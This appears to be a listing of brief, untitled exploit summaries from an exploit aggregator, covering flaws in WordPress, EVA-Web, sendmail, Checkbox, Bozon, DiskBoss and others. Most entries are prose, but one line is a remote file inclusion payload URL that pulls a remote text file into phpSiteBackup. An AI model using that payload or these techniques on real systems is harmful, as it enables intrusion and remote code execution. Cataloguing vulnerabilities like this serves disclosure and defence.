This script allows an attacker to upload arbitrary files to a vulnerable Wordpress installation. It takes the target host, a valid username and password, the path to the remote file, and the file to upload as arguments. The script also creates a new post every time it is run, unless a post ID is specified.
The EVA-Web version 1.1 to 2.2 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from a remote server, potentially leading to remote code execution.
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?
The Avaxswf.dll library included in the Avax Vector ActiveX v.1.3 software package is vulnerable to arbitrary data write in a remote computer. The WriteMovie method doesn't check if it is being called from the application or from a malicious user, allowing the manipulation of local files insecurely and the ability for malicious users to write arbitrary data to any file on a vulnerable system.
This code exploits a well-known local-root bug in sendmail 8.11.x. It gives instant root shell with +s sendmail 8.11.x, x < 6.
The exploit overwrites the system.ini file, potentially causing damage to the system. It is recommended to make a copy of the file before running the exploit.
Checkbox is a survey application deployed by a number of highly profiled companies and government entities. The vulnerabilities include a directory traversal vulnerability, direct object reference vulnerability, and an open redirection vulnerability. The directory traversal vulnerability allows an attacker to download sensitive files such as the web.config file. The direct object reference vulnerability allows access to attachments without login. The open redirection vulnerability allows an attacker to redirect users to a malicious website.
A Bozon vulnerability allows unauthenticated attackers to add arbitrary users and inject system commands to the "auto_restrict_users.php" file of the Bozon web interface. This issue results in arbitrary code execution on the affected host, attackers system commands will get written and stored to the PHP file "auto_restrict_users.php" under the private/ directory of the Bozon application, making them persist. Remote attackers will get the command responses from functions like phpinfo() as soon as the HTTP request has completed. In addition when an admin or user logs in or the webpage gets reloaded the attackers commands are then executed as they are stored. If a Command is not injected to the "auto_restrict_users.php" file, unauthenticated attackers can opt to add user accounts at will.
This vulnerability allows an attacker to include local files on the server by manipulating the 'doc_id' parameter in the URL. By replacing the first hex value before the comma, an attacker can include any file on the server.
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
Services By CQR